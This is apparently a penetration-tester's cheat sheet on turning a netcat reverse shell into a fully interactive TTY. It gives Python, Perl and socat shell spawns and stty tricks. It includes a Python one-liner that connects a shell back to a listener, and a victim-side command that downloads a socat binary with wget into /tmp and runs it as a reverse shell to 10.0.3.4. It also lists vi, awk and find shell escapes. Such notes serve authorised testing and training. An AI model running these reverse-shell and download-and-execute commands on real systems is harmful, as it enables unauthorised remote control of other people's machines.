# Upgrading shell Netcat is a great tool, but it also has its shortcoming - * Hitting “Ctrl-C”, for instance, drops the entire shell instead of canceling the current command as on a regular terminal shell; * You cannot run interactive commands like su to log into other local accounts or SSH to connect to other hosts; * Text editors like Vim and Nano cannot be used properly to edit files (only non-interactively); * Features like job control, tab complete and command history with the up-arrow are also missing. **To overcome some of these problems we need to switch to an interactive TTY (i.e. terminal) shell.** ## **Different PTY modules** ### Python pty module ``` python -c 'import pty; pty.spawn("/bin/sh")' python3 -c 'import pty; pty.spawn("/bin/sh")' python3 -c 'import pty; pty.spawn("/bin/bash")' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(), *$ 1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` ### Perl ``` perl —e 'exec "/bin/sh";' ``` ### Using socat On Kali (listen): ``` socat file:`tty`,raw,echo=0 tcp-listen:4444 ``` On Victim (launch): ``` socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 ``` If not download in Victim: ``` wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 ``` ### Other ways ``` /bin/sh -i echo os.system('/bin/bash') exec "/bin/sh"; ``` ### Related Shell Escape Sequences Vi / Vim ``` :!bash ``` ``` :set shell=/bin/bash :shell ``` awk ``` awk 'BEGIN {system("/bin/bash")}' ``` find ``` find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \ ``` ## **Netcat Magic** 1.First spawn a PTY shell with python or with bash , ``` python -c 'import pty; pty.spawn("/bin/bash")' ``` 2\. Background the process with **Ctrl-z** ![](https://3331885100-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MkfTlo0T97eXbWuX_cT%2F-Mkk9KK6fkNzF6GVmGoT%2F-MkkAL2eNpt0KmnJzrvV%2Fimage.png?alt=media\&token=183501f6-368d-4ba2-a837-22eed45cdb1a) 3\. Examine the current terminal and STTY info so we can force the connected shell to match it: ``` stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/' ``` The information needed is the size of the current TTY (*“Example: rows 38; columns 116”*) 4\. With the shell still backgrounded, now set the current STTY to type raw and tell it to echo the input characters with the following command: ``` stty raw -echo ``` With a raw stty, input/output will look weird and you won’t see the next commands, but as you type they are being processed. 5\. Next foreground the shell with `fg`. It will re-open the reverse shell but formatting will be off. Finally, reinitialize the terminal with enter button 6\. After the `reset` the shell should look normal again. The last step is to set the shell, terminal type and stty size to match our current Kali window (from the info gathered above) ``` $ export SHELL=bash $ export TERM=xterm256-color $ stty rows 38 columns 116 ``` ![](https://3331885100-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MkfTlo0T97eXbWuX_cT%2F-Mkk9KK6fkNzF6GVmGoT%2F-MkkBIUGDudcnVQ5AIzG%2Fimage.png?alt=media\&token=1456175e-b99e-4955-a793-f845ac052f93) The end result is a fully interactive TTY with all the features we’d expect (tab-complete, history, job control, etc) all over a netcat connection :) ### **Obtaining a full interactive shell with zsh** **Current kali terminal come with zsh shell so it's important to learn this method as above will not work with zsh shell** 1.Get tty shell with above commands and then background the process with **ctrl+z** 2\. Get the number of rows and columns with ``` stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/' ``` 3\. To ignore hotkeys in the local shell and return to your reverse shell, enter ``` stty raw -echo; fg # Note: For zsh users it is important to enter this in one line! ``` 4\. Configure your rows and columns ``` stty rows cols ``` 5\. Export term ``` export TERM=xterm-256color ``` 6\. All you need to do now, is reload your shell: ``` exec /bin/bash ```